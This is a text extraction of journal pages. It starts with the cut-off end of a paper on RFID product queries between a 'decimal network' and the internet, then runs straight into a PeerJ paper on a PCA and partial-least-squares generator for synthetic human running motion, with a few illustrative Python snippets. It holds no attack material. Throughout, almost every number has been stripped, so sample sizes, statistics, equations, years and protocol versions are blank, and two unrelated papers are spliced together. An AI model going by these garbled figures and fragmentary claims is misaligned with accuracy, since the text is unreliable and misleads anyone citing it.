c) internet middleware delivers product and service domain names to the sns server. d) sns server returns the middle results to the middleware . e) the middleware returns the results to the expert module. f) the expert module requests product information from the information server according to the address information inquired. g) the expert module returns the product information to the query server of decimal network to complete the process of product information query. in the direct routing mode, if the product's rf tags are encoded in ipv and ipv protocols, and the product-related information is stored in the server of the decimal network, the query process needs to involve ipv router, information server, expert module and query server. international journal of advanced network, monitoring and controls volume , no. , decimal network ipv direct routing server information server internet label reader requery server a) b) c) f) e)identifier of product and service transformation ruler of domain of product and server identifier of product and service non-decimal product identifier expert modul protocol transformation h) ipv ipv / ipv figure . the access process from internet to decimal network under the direct routing ) the access process can be described as follows. a) rf readers read ipv or ipv identifiers and identifiers of product and service from electronic tags. b) submitting identifiers of product and service to the query server over the internet network. c) the query server calls the expert module's decimal network interface. d) the expert module of decimal network interface accesses the ipv router for the decimal network architecture through identifiers of product and service . e) the pv router converts the product and service digital identifiers to the ip address of the product information server. f) the ipv router accesses the information server and requests product information. g) the ipv router returns product information to the internet user via the expert module. in the above process, the expert module between the two network systems realizes the translation and conversion of the data formats of the two systems. the protocol conversion module can translate the ip address, message and header. vi. conclusion this paper proposes two kinds of information query exchange services between decimal network and internet to solve the problem that the encoding format of radio frequency tag is not uniform with the network protocol format of product information server. experimental results show that both methods can provide efficient rf information query service. references [ ] sj/t ccccc-cccc digital identity format specification for information processing products and services. [ ] sj/t ddddd-dddd rf-based domain name specification for products and services [ ] ietf rfc domain names-concepts and facilities [ ] ietf rfc domain names-implementation and specification [ ] ietf rfc tcp and udp with bigger addresses [ ] ietf rfc iso use of iso clnp in tuba environments [ ] ietf rfc a historical perspective on the usage of ip version [ ] ietf rfc a view from the st century [ ] ietf rfc - assigned numbers) submitted july accepted november published december corresponding author juan vicente durá-gil, juan.dura@ibv.upv.es academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright baydal-bertomeu et al. distributed under creative commons cc-by . 
open access a pca-based bio-motion generator to synthesize new patterns of human running josé maría baydal-bertomeu*, juan vicente durá-gil*, ana piérola-orcero*, eduardo parrilla bernabé*, alfredo ballester* and sandra alemany-munt* instituto de biomecánica de valencia, universitat politècnica de valència, valencia, spain * these authors contributed equally to this work. abstract synthesizing human movement is useful for most applications where the use of avatars is required. these movements should be as realistic as possible and thus must take into account anthropometric characteristics (weight, height, etc.), gender, and the performance of the activity being developed. the aim of this study is to develop a new methodology based on the combination of principal component analysis and partial least squares regression model that can generate realistic motion from a set of data (gender, anthropometry and performance). a total of volunteer runners have participated in the study. the joint angles of the main body joints were recorded in an experimental study using d motion tracking technology. a five-step methodology has been employed to develop a model capable of generating a realistic running motion. the described model has been validated for running motion, showing a highly realistic motion which fits properly with the real movements measured. the described methodology could be applied to synthesize any type of motion: walking, going up and down stairs, etc. in future work, we want to integrate the motion in realistic body shapes, generated with a similar methodology and from the same simple original data. subjects data mining and machine learning, graphics, scientific computing and simulation keywords synthesizing motion, motion analysis, pls, running, pca introduction it is well known that there is a large degree of information contained in the kinematics of a moving body which is influenced by parameters such as: gender, age, anthropometrical fea- tures, emotional state, personality traits, etc. (troje, ). a number of studies demonstrate the capability of the human visual system to detect, recognize and interpret the information encoded in the biological motion (johansson, ). there are also many attempts to analyse this information encrypted in human motion. some researchers use discrete kinematics parameters such as ranges, speed, etc. (dvorak et al., ). others focus their studies on the sequence of movement along time instead of recording simple parameters. in these cases, they analyse the complete function of time f (t) (feipel et al., ). a number of kinematical models are based on frequency domain manipulations (davis, bobick & richards, ) and multiresolution filtering (bruderlin & williams, ). how to cite this article baydal-bertomeu et al. ( ), a pca-based bio-motion generator to synthesize new patterns of human run- ning. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:juan.dura@ibv.upv.es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. nevertheless, the most common objective of these studies is to model and to classify the movement pattern of the person being measured, rather than creating new motions from the extracted information. 
in this regard, motion synthesis is currently attracting a great deal of attention within the computer graphics community as a means of animating three dimensional realistic characters and avatars; and in the robotic field to provide controlled real-time dynamic motion for the locomotion and other activities (kajita et al., ). with the computational resources available today, large-scale models of the body (i.e., models that have many degrees of freedom and are actuated by many muscles) may be used to perform realistic simulations (pandy, ). nevertheless, it is necessary to perform lab experiments to track the positions and orientations of body segments executing the task aimed to be synthesized. recording motion data directly from real actors and mapping them to computer characters is a common technique used to generate high quality motion (li, wang & shum, ). however, this technique requires a high effort in experimental work. besides, new measures are needed to include changes in the pattern of movement, such as age, weight, gender or speed. in this sense, it would be useful to create a methodology based on biomechanical models constructed from a database of motions, instead of a single actor, able to generate realistic motions of individuals with different anthropometrical characteristics, with sufficient accuracy and without the need to perform laboratory measurements. several authors have addressed the motion modelling and synthesis for biped walking, jumping, pedalling (troje, ), or even stair-ascending (vasilescu, ). classically the mathematical approach of the synthesis of movement has been the dynamic optimization of biomechanical body structures (pandy, ). these models provide detailed information of the functioning of some structures, such as the description of muscle function during normal gait. however, this approach becomes an unworkable problem when a greater number of body structures are included in the model. a new approach based on principal components analysis (pca) can facilitate the understanding of the information contained in the kinematics of a moving human body and avoids the inclusion of the dynamics in the model. pca can extract depth information contained in the mathematical function and its derivatives not normally available through traditional statistical methods (ullah & finch, ). in this way pca can be used on different levels. for instance, troje ( ) used pca in two steps for the purpose of analysing and synthesizing human gait patterns. in the first one, they extracted the main components from the entire database, in order to eliminate redundancy and to reduce the dimensionality. in the second step, pca was applied particularly for each walker in order to retain the encoded information of each walker-specific variation. in our research, we will also use a model (based on pca) to extract the most relevant information from the pattern of running. this information will be used to develop a bio-motion generator which will solve the opposite problem of synthesizing new realistic movements. in addition, existing literature focused on synthesizing motion does not correlate the generated movement to age, gender, performance parameters such as velocity or anthropometrical features. in this sense our research has three goals. the first one is to generate a database of running movements of a full human model. the second is to baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
extract the signature of each motion, by means of pca technique and to correlate the distinctive styles of each runner with their anthropometrical characteristics, age, gender, and performance parameters such as the velocity of the action. the third is to develop a bio-motion generator based on a statistical model capable of synthesizing new realistic running motion from a set of desired data: age, gender, height, body mass index (bmi) and velocity. nowadays there exists a line of research developed in the field of anthropometry for the purpose of obtaining a model of human body shape from a database of processed raw scans (vinué et al., ). the methodology followed in that line of research provides sufficient resolution to synthesize accurate realistic representations of body shapes from a set of simple anthropometrical parameters. ballester et al. ( ) describe a method based on the harmonization of body scan data followed by a shape analysis procedure using principal component analysis. the combination of these techniques allows the generation of human d shape models from anthropometric measurement data (age, height, weight, bmi, waist girth, hip girth, bust/chest girth, etc.). our hypothesis is that the use of a similarly based methodology to generate human motion instead of human body shapes is possible, valid and reliable. the novelty in our approach is the generation of running data from a set of easily measurable anthropometric parameters and a desired value of running speed. materials and methods data gathering an experimental phase was carried out with the aim of gathering a database of the running movements that we needed to include in the biomechanical model. the data consisted of the d joint angles of the main body joints. the articulated human body model used in our study comprised segments and joints distributed throughout the body. lower limb: hip, knee, ankle and metatarsopha- langeal joint; upper limb: shoulder, elbow and wrist; trunk: pelvis, l , l , t , t and neck. the positions of the joints of the human body model were defined in a recursive mode with respect to the origin joint (father) of the related segment. this methodology is based on the biovision hierarchical data (bvh) format (meredith & maddock, ). each subject was kinematically characterised by means of variables, defined as follows: . vertical (z) position of the root segment, in our case the hips. . tri-dimensional orientation (x, y, z) of the total amount of segments with respect the root. × = variables. study sample eighteen people composed the study sample, with the same number of male and female. theiragesranged from to years (averageage: years). theywere selectedaccordingto some specific parameters, trying to cover a wide range in the anthropometric characteristics of height and body mass index (table ). ethical approval was obtained from the ethics committee of the universitat politècnica valència. all participants gave written informed consent. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table description of the anthropometrical parameters. gender parameter mean std. max. min. age . . weight . . . . height . . . . male bmi . . . . age . . weight . . . . height . . . . female bmi . . . . measurement and protocol the measurements were performed using commercial equipment based on inertial sensors: moven studio. the commercial system has been validated by previous studies (zhang et al., ; thies et al., ). 
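as a concrete illustration of the kinematic characterisation described under data gathering, the sketch below packs one frame of bvh-style data (vertical position of the root plus one x/y/z orientation triple per segment) into a single observation vector. the segment list and the values are illustrative placeholders only; the actual joint set and variable count are those given in the text above.

```python
import numpy as np

# placeholder segment list; the real model uses the lower-limb, upper-limb and
# trunk segments listed in the text (hip, knee, ankle, shoulder, elbow, wrist, pelvis, ...)
SEGMENTS = ["pelvis", "r_hip", "r_knee", "r_ankle", "l_hip", "l_knee", "l_ankle"]

def frame_to_vector(root_z: float, orientations: dict) -> np.ndarray:
    """pack one motion frame as [root_z, seg1_x, seg1_y, seg1_z, seg2_x, ...]."""
    values = [root_z]
    for seg in SEGMENTS:
        values.extend(orientations[seg])   # (x, y, z) orientation of the segment w.r.t. the root
    return np.asarray(values)

# toy frame: root height 0.95 and zero orientations everywhere
frame = frame_to_vector(0.95, {seg: (0.0, 0.0, 0.0) for seg in SEGMENTS})
print(frame.shape)   # (1 + 3 * len(SEGMENTS),) -> (22,)
```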
a sampling frequency of hz was used. this system showed a very high sensitivity to electromagnetic fields. for this reason, the measurements of running trials were done outdoors in a location free of electromagnetic pollution. experimental procedure for the purpose of controlling the pace of running, a -metre-long corridor, delimited with cones every m, was set up. thus, we obtained four areas: one area of acceleration, two of constant speed and a final deceleration area. running at constant speed presents a periodic timing in which the period depends on the velocity (novacheck, ). nevertheless, acceleration and deceleration periods are out of phase and the duration of cycles is variable. therefore, the running cycles used to create our model were selected within the area of constant speed. in the case of running, the pattern of the movement changes with velocity (e.g., stride length, maximum joint angles, etc.). for this reason, each runner completed six running trials at different speeds. initially, subjects started running at normal speed. in the second measurement subjects ran at their maximum speed. the third and fourth trials were performed at a pace between normal and maximum speed. the fifth trial was performed at the minimum speed at which each runner was able to run, on the edge between walking and running; running is defined in this case as when there is no phase of bipodal support (biewener et al., ). the last trial was performed at an average speed between the lower and the normal speed. this procedure allowed us to obtain six observations representing the whole range of speeds that each subject could execute. mathematical procedure the methodology used in our study comprised five steps: -reduction of intra-personal variability: joint angles are periodic by nature. we took the most representative single stride for the purpose of reducing variability and dismissing the phases with no consistent speed, such as acceleration and deceleration steps. the selected stride was picked in the middle of the running sequence, guaranteeing constant speed. figure knee angle vs % of the cycle. -time normalization: time normalization is usually employed for the temporal alignment of cyclic data obtained from different trials with different duration. in our approach, the number of samples for each stride depended on the velocity of the running. at this point we normalised the variable "time" applying an interpolation technique based on cubic splines through the measured values of the whole sequence of samples. this technique enables the normalization of all the measurements to the percentage of the running cycle. the cubic spline was applied to normalize at equispaced time intervals per each variable (see the example in fig. ). the application of the cubic spline to the kinematical variables makes a total amount of × ( , ) data per each subject. -data cleaning: at this point a detailed checking and cleaning of inaccuracies of the kinematical data was conducted. these types of inaccuracies were caused mostly by the measurement system. the prevention of errors at this point is preferable to their later correction once the model has been created. all the measurements have been manually analysed thoroughly by an experienced examiner.
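the time-normalization step above can be sketched with a few lines of python, using scipy's cubic-spline interpolation to resample one joint-angle curve to a fixed number of equispaced points over the stride; the 101-point grid and the synthetic knee-like curve are assumptions made only for this example.

```python
import numpy as np
from scipy.interpolate import CubicSpline

def normalize_to_cycle(angles: np.ndarray, n_points: int = 101) -> np.ndarray:
    """resample one joint-angle curve to n_points equispaced samples (0-100% of the stride)."""
    t = np.linspace(0.0, 1.0, num=len(angles))     # original, speed-dependent time base
    spline = CubicSpline(t, angles)
    cycle = np.linspace(0.0, 1.0, num=n_points)    # percentage of the running cycle
    return spline(cycle)

# toy stride: a knee-like flexion curve sampled at an arbitrary number of frames
raw = 60.0 * np.sin(np.linspace(0.0, np.pi, num=87)) ** 2
normalized = normalize_to_cycle(raw)
print(normalized.shape)   # (101,)
```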
the identified inaccuracies were treated as follows: (a) angular offsets: this common error usually appears during the standing posture and can affect the later joint angles registers during the trial (running) (mills et al., ). offsets have been corrected manually eliminating (adding or subtracting) the difference between the initial angle observed and the expected angle of the body segment at this position. (b) positioning error: due to the fact that our measurement system, based on inertial sensors, uses the earth’s magnetic field to determine the reference position of each subject, it is quite common to find subjects with slight differences in their initial reference positions. in this case, we have proceeded by correcting the reference system aligning it with the direction of running forward. thus, we can guarantee that all measurements are equally oriented. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. (c) non-physiological angles: some errors in the registration of joint angles were detected in the database. these inaccuracies came from errors of the inertial sensors. in this case, it was not possible to correct the error effectively, thus we proceed by eliminating these observations from the database and repeating the measurement. -dimensionality reduction: the database of all measurements was combined in a single matrix w . the initial number of observations is ( subjects× velocities= ). but three measurements fail, therefore w has rows (observations) and , columns ( equispaced time intervals × kinematical variables). motion data of each observation is enclosed in the rows of the matrix w =(wi),i= ,..., . before the creation of the bio-motion generator, by means of a regression model, it was needed to reduce the dimensionality of the motion data. computing a pca on the running data (contained in matrix w ), resulted in a decomposition of the data matrix w into an average running vector w and , weighed components, arranged in a , × , matrix v : w =w +α·v ( ) where w is a × , matrix with all rows equal to w and α=(αi) with i= ,..., is a × , matrix of pca scores. each observation wi was thus expressed by a linear combination of scores αi and pca components (columns of matrix v ). components represented factors related to gender, anthropometrical traits and running speed. and scores represented individual characteristics of each runner and performance of the running trial related to the previous factors. pca components are arranged in descendent order of explained variance of the original matrix data. thus the first columns in matrix v retained most of the information in the data sample and it was possible to select a reduced number of components c. wic =w +αic ·vc. ( ) above w denoted the average of all the running samples. the matrix vc contained the first components. αic represents the c scores of each observation of the database in the reduced dimension space formed by the selected components. as score values change from negative to positive values, the movement of the runner changes from men to women; high bmi to low bmi; high speed to low speed, etc. the decision of how many components to retain was a critical issue in the exploratory factor analysis. to perform this decision we used the methodology of parallel analysis (pa) (hayton, allen & scarpello, ). pa is a monte-carlo based simulation method that compares the observed eigenvalues (components) with those obtained from randomized normal variables. 
a component is retained if its explained variance or information is higher than the information provided by the eigenvectors derived from the random data. -regression model: one of the objectives of our work was to generate a statistical model capable of synthetizing new realistic running motion from a set of desired data: age, gender, height, weight and velocity, also called d data. accordingly, to devise the baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. bio-motion generator, we needed to establish the correlation between the d data and pca scores, which provide the signature of each motion. the correlation was obtained as a regression model, combining a partial least squares (pls) regression model as a first step and a linear regression model (lrm) as a second step. pls methodology is explained in wold ( ) and geladi & kowalski ( ). this type of regression model is suitable for the kind of data involved in the bio-motion generator since the input data of the model is strongly correlated (anthropometrical information). the pls regression model takes the d data—age, height, weight and velocity—as input information and produces a set of pca scores as output. the lrm model was applied to these output pca scores to reflect the influence of gender in the pca scores. in the first step, we estimated a pls model considering anthropometrical data and velocity of the movement as independent variables and the pca scores as dependent variables. the general formula of a pls model is: y −y =b·(x−x )+e ( ) where y is the matrix of dependent variables, x is the matrix of independent variables, x and y are the matrices of mean data, b is the coefficient matrix of the pls model and e is the prediction error matrix. havingfourdifferent dmeasurementsforeachsubjectxi=[age,height,weight,velocity], we built a × matrix x formed by the concatenation of the vectors xi. notice that since matrix =α , it is constituted by pca scores and the mean matrix y is the zero matrix. finally, we estimated the coefficient matrix b from sample data x and α with the pls algorithm and substituted in the equation above, obtaining the following model: α=b·(x−x )+e. ( ) where x is the matrix of mean anthropometrical data and velocity, and e is the prediction error matrix. pls decomposes the independent and dependent variables in component spaces in order to obtain their correlation. the number of significant pls components in the model was selected in a leave-one-out procedure and according to the explained variance (r ) criteria. secondly, the influence of gender was modelled with a lrm of the prediction error matrix e with coefficients a = (a ,...,ac) and b = (b ,...,bc), where c is the number of retained pca components: ê =a+b·gender ( ) where gender = for men and gender = for women. this way, the motion information related to gender which is part of the pls error matrix e, and uncorrelated with the prediction derived from the pls regression, was modelled. notice that aj and bj were considered zero whenever their f-value was below a desired level of statistical significance of %. once we have obtained b, a and b, whenever we want to synthesize a running motion from new anthropometrical data and velocity, we obtain the corresponding scores α̂ of the baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. 
new realistic running motion by the following formula: α̂=[a−b·x ]+ [ b b ] · [ x gender ] ( ) where x is the matrix of mean anthropometrical data and velocity. validation methodology of the bio-motion generator to validate the five-step methodology described to develop the bio-motion generator we propose a comparison between each recorded observation and the prediction of running motion generated by the model by means of the ‘leave-one-out’ procedure. the recorded observation is considered the true angle curve of the running motion. the predicted motion is estimated using the ‘leave-one-out’ validation technique; that is, not including that observation in the bio-motion generator. we wish to determine if both curves are reproducible and sufficiently similar to consider that they represent the same motion. for this purpose, we use the intraclass correlation coefficient (icc) as a measurement of the reliability, and the standard error of measurement (sem) as a direct measurement of the global error between true and predicted angles. theoretically, the icc is defined as the ratio between the true variance and the predicted variance. the icc varies between and and can be interpreted as the proportion of variance due to the methodology (true versus predicted data) in the total variance. an icc greater than . is generally considered to be good (fleiss, ). the icc is determined between the measured or true curve (tc) and the estimated curve (ec) provided by the bio-motion generator. the icc is determined from the variance of both curves (tc) and (ec) following the next equation: icc= σ ec (σ tc +σ ec ) ; ( ) on the other hand, sem represents the existent difference between observed (tc) and estimated curves (ec) determined with the bio-motion generator, and provide an indication of the real magnitude of the error. sem=σc · √ ( −icc); ( ) where σc is the combined standard deviation of the true scores (tc) and observed scores (ec). and se is the combined standard deviation of the true scores and observed scores. we have obtained the sem for each pair of true and predicted angles for the three spatial directions in all the joints that form the human model. for that reason, we have represented the sem by its descriptive statistics (mean, std., -percentile and -percentile). results parallel analysis the results of the pa (fig. ) have been obtained with the explained variance of the main components extracted from the original data and the same obtained from randomized baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. number of principal components e xp la in e d v a ri a n ce ( % ) original data random data figure relation between the explained variance and the number of principal components extracted from the database and from randomized data. data. the intersection point of both curves indicates the optimal number of components to extract from the pca. the original number of dimensions was ( related to the pelvis translation + related to the body segments orientation). the results of the pa recommend retaining the first eigenvalues, which explain the . % of the total variance. thus, the pca allowed a percentage of data reduction of %, from variables to weighed components. regression model as it has been explained in the methodology, the regression model consists of two parts, the first including the anthropometrical data (pls) and the second the gender (lrm). 
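a condensed sketch of this two-part model and of the synthesis formula above is given below: it chains the pca decomposition of the motion matrix, a pls regression from the d-data (age, height, weight, velocity) to the pca scores, and a per-component linear gender term on the residual scores. the random data, shapes and component counts are arbitrary stand-ins, so the snippet illustrates only the structure of the pipeline, not the model fitted in this study.

```python
import numpy as np
from sklearn.cross_decomposition import PLSRegression
from sklearn.decomposition import PCA
from sklearn.linear_model import LinearRegression

rng = np.random.default_rng(0)

# stand-in motion database: shapes and counts are arbitrary placeholders
W = rng.normal(size=(100, 3000))          # observations x kinematic values
X = rng.normal(size=(100, 4))             # d-data: age, height, weight, velocity
gender = rng.integers(0, 2, size=100)     # 0/1 coding, purely illustrative

# pca decomposition: w = w_mean + scores @ components
pca = PCA(n_components=10)
alpha = pca.fit_transform(W)              # pca scores of each observation
V = pca.components_                       # weighed components

# step one of the regression: pls from d-data to pca scores
pls = PLSRegression(n_components=3)
pls.fit(X, alpha)
E = alpha - pls.predict(X)                # prediction error matrix

# step two: linear model of the residual scores on gender
gender_model = LinearRegression().fit(gender.reshape(-1, 1), E)

def synthesize(age, height, weight, velocity, g):
    """return a synthetic motion vector for the given d-data and gender code."""
    x = np.array([[age, height, weight, velocity]])
    alpha_hat = pls.predict(x) + gender_model.predict(np.array([[g]]))
    return pca.mean_ + alpha_hat @ V

print(synthesize(30.0, 1.75, 70.0, 3.5, 1).shape)   # (1, 3000)
```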
the dependent variables of the pls are the scores of the first principal components (pc) of the kinematical running motion. therefore, they are uncorrelated and the optimal number of pls components are separately determined for each pc score (pc ... pc ) according to its adjusted r plot (fig. ). pls components are retained until their r curve exhibits a decrease or a non-significant increase. thus, for instance, two pls components are retained for pc , whereas no components are considered for pc and pc . notice that for those pc with retained components, the pls model provides their mean value as output. this way, the motion information associated to those pc which is provided by the pls model is the average motion. with regard to the lrm, which analyses the influence of gender in the kinematics of running, the pca scores which are significantly affected by gender are pc , pc , pc , pc and pc (table ). the prediction obtained in the first step of the model is improved by the influence of gender on these pc. pc and pc are only affected by gender, since their number of retained pls components was . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed − . . . . pc number of pls components r −s qu ar ed figure leave-one-out r estimation plots for the pls model. validation of the bio-motion generator the results of the reliability study, computed from the observations and the same calculated by means of the leave-one-out technique, showed that the mean and standard deviation of icc, was . ( . ) with a percentile of . and percentile of . . only one subject exhibit an icc lower than . in two observations (fig. ). the sem between the real and the predicted angles determined with the leave-one-out model showed a mean (std.) of . ◦ ( . ◦), with a percentile of . ◦ and percentile of . ◦ (fig. ). discussion in this paper we have demonstrated that the five-step methodology on which the bio-motion generator is based provides running motion models closely resembling the measurements obtained with real subjects. however, while the sem study shows that the vast majority of errors detected between actual and predicted data of the bio-motion generator are less than ◦, there are a percentage of observations ( %) in which greater errors are observed. this can be explained because the model has been obtained from a small number of subjects—only —and therefore the bio-motion generator is not able to adjust the running specific characteristics of each corridor. future work in this line of research baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table anova table for the linear models. df sum sq mean sq f-value pr (>f) gender . . pc residuals gender . . pc residuals gender . . * pc residuals gender . . pc residuals gender . . pc residuals gender . . pc residuals gender . . * pc residuals gender . . ** pc residuals gender . 
. * pc residuals gender . . pc residuals gender . . *** pc residuals gender . . pc residuals notes. signification codes . ‘***’; . ‘**’; . ‘*’. must be done to increase the database of real subjects measured and incorporate greater variability in anthropometric and performance characteristics. the bio-motion generator is based on a methodology which comprises five steps. in the fourth step we tackle a dimensionality reduction based on pca. this step is similar to that performed by troje ( ). however, there are some differences, as he obtained four main components that explain more than % of the variance and we have obtained components explaining . % of variance. the greater variability of our study is explained partly by the greater variability of the running against walking and on the other hand by the greater speed range in our study in relation to troje, in which each subject could select a single comfortable walking speed. on the other hand, troje made a second reduction of the dimensionality based on the simplicity of temporal behaviour of the walking components which could be modelled with pure sine functions with a scaled fundamental frequency. this approach was not valid for the motion of running, due to the fact that the pcs of running cannot be modelled with a proportional frequency. this suggests that running is a more complex motion than walking in the sense that there does not exist a proportion between the frequency of oscillation of the different body segments. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure frequency histogram of the icc. sem f re q u e n cy figure frequency histogram of the sem. the fifth step of the methodology consists of a two-step linear regression which correlates a given list of d measurements with the pca scores of movement. a linear regression technique has been used before to approximate motion models from a reduced marker set and estimate the remaining markers (liu et al., ) or to model the motion-style and the spatio-temporal movement (torresani, hackney & bregler, ). however, it has not been used before to synthesize new human motion directly from a set of anthropometrical and performance data. in this sense, it can be considered a real breakthrough in the field of synthesis of human motion. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure reconstructed virtual biomechanical model (skeleton+motion). conclusions the major contribution of this paper is a novel statiscal methodology for modelling human movements. the method described in this article has been developed and validated for running motion, but this same methodology could be used to synthesize other types of motion: walking, going up and down stairs, or even for sport movements such as: jumping, pedalling, golf swing and putting, etc. our work aims to provide a realistic motion to body shapes that can be developed with the methodology described in the work of ballester et al. ( ). those body shapes could include an adjusted skeleton formed by a hierarchical set of interconnected joints and can be used to move the body shape with the required or desired motion provided by our methodology (fig. ). the integration of both methods will allow generating realistic avatars supplied with realistic motion from a set of adjustable and simple anthropometrical and performance data and without the need of the realization of new measurements. 
a limitation of this study is the sample size. further work needs to be done in order to validate with a broader sample of people. notwithstanding this limitations, the findings suggest that the model is valid. additional information and declarations funding the research for this paper was done within the easy-imp project (http://www.easy- imp.eu/) funded by the european commission fp .fof.nmp. - project . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.easy-imp.eu/ http://www.easy-imp.eu/ http://dx.doi.org/ . /peerj-cs. grant disclosures the following grant information was disclosed by the authors: european commission: fp .fof.nmp. - project . competing interests the authors declare there are no competing interests. author contributions • josé maría baydal-bertomeu conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • juan vicente juan v. durá-gil conceived and designed the experiments, performed the experiments, analyzed the data, wrote the paper, prepared figures and/or tables, reviewed drafts of the paper. • ana piérola-orcero analyzed the data, wrote the paper, prepared figures and/or tables, performed the computation work. • eduardo parrilla bernabé prepared figures and/or tables, performed the computation work. • alfredo ballester and sandra alemany-mut reviewed drafts of the paper. ethics the following information was supplied relating to ethical approvals (i.e., approving body and any reference numbers): ethics committee. universitat politècnica of valencia. data availability the following information was supplied regarding data availability: the raw data has been supplied as supplementary file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references ballester a, parrilla e, uriel j, pierola a, alemany s, nacher b, gonzalez j, gonzalez jc. . d-based resources fostering the analysis, use, and exploitation of available body anthropometric data. in: th international conference on d body scanning technologies. biewener aa, farley ct, roberts tj, temaner m. . muscle mechanical advantage of human walking and running: implications for energy cost. journal of applied physiology ( ): – doi . /japplphysiol. . . bruderlin a, williams l. . motion signal processing. in: proceedings of the nd annual conference on computer graphics and interactive techniques. acm, – . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. /supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /japplphysiol. . http://dx.doi.org/ . /peerj-cs. davis j, bobick a, richards w. . categorical representation and recognition of oscillatory motion patterns. in: proceedings of the ieee conference on com- puter vision and pattern recognition, , vol. . piscataway: ieee, – doi . /cvpr. . . dvorak j, antinnes ja, panjabi m, loustalot d, bonomo m. . age and gender related normal motion of the cervical spine. spine ( suppl):s –s doi . / - - . feipel v, rondelet b, lepallec jp, dewitte o, rooze m. . the use of dishar- monic motion curves in problems of the cervical spine. 
international orthopaedics ( ): – doi . /s . fleiss jl. . the design and analysis of clinical experiments. new york: wiley. geladi p, kowalski br. . partial least-squares regression: a tutorial. analytica chimica acta (january): – doi . / - ( ) - . hayton jc, allen dg, scarpello v. . factor retention decisions in exploratory factor analysis: a tutorial on parallel analysis. organizational research methods ( ): – doi . / . johansson g. . visual perception of biological motion and a model for its analysis. perception & psychophysics ( ): – doi . /bf . kajita s, kanehiro f, kaneko k, fujiwara k, yokoi k, hirukawa h. . a realtime pattern generator for biped walking. in: proceedings of the ieee international conference on robotics and automation, , vol. . piscataway: ieee, – doi . /robot. . . li y, wang t, shum h-y. . motion texture: a two-level statistical model for character motion synthesis. in: acm transactions on graphics (tog), vol. . new york: acm, – . liu g, zhang j, wang w, mcmillan l. . a system for analyzing and indexing human-motion databases. in: proceedings of the acm sigmod international conference on management of data. new york: acm, – . meredith m, maddock s. . motion capture file formats explained. department of computer science, university of sheffield, sheffield. available at http://www.dcs. shef.ac.uk/intranet/research/public/resmes/cs .pdf . mills pm, morrison s, lloyd dg, barrett rs. . repeatability of d gait kinematics obtained from an electromagnetic tracking system during treadmill locomotion. journal of biomechanics ( ): – doi . /j.jbiomech. . . . novacheck tf. . the biomechanics of running. gait & posture ( ): – doi . /s - ( ) - . pandy mg. . computer modeling and simulation of human movement. annual re- view of biomedical engineering ( ): – doi . /annurev.bioeng. . . . thies sb, tresadern p, kenney l, howard d, goulermas jy, smith c, rigby j. . comparison of linear accelerations from three measurement systems during ‘‘reach & grasp". medical engineering and physics ( ): – doi . /j.medengphy. . . . baydal-bertomeu et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /cvpr. . http://dx.doi.org/ . / - - http://dx.doi.org/ . /s http://dx.doi.org/ . / - ( ) - http://dx.doi.org/ . / http://dx.doi.org/ . /bf http://dx.doi.org/ . /robot. . http://www.dcs.shef.ac.uk/intranet/research/public/resmes/cs .pdf http://www.dcs.shef.ac.uk/intranet/research/public/resmes/cs .pdf http://dx.doi.org/ . /j.jbiomech. . . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /annurev.bioeng. . . http://dx.doi.org/ . /j.medengphy. . . http://dx.doi.org/ . /peerj-cs. torresani l, hackney p, bregler c. . learning motion style synthesis from percep- tual observations. in: advances in neural information processing systems. cambridge: mit press, – . troje nf. . decomposing biological motion: a framework for analysis and synthesis of human gait patterns. journal of vision ( ): – doi . / . . . troje n. . retrieving information from human movement patterns. in: thomas fs, zacks jm, eds. understanding events: from perception to action. oxford: oxford university press, – . ullah s, finch cf. . applications of functional data analysis: a systematic review. bmc medical research methodology : doi . / - - - . vasilescu mao. . human motion signatures: analysis, synthesis, recognition. in: proceedings of the th international conference on pattern recognition, vol. . piscataway: ieee, – . vinué g, león t, alemany s, ayala g. . 
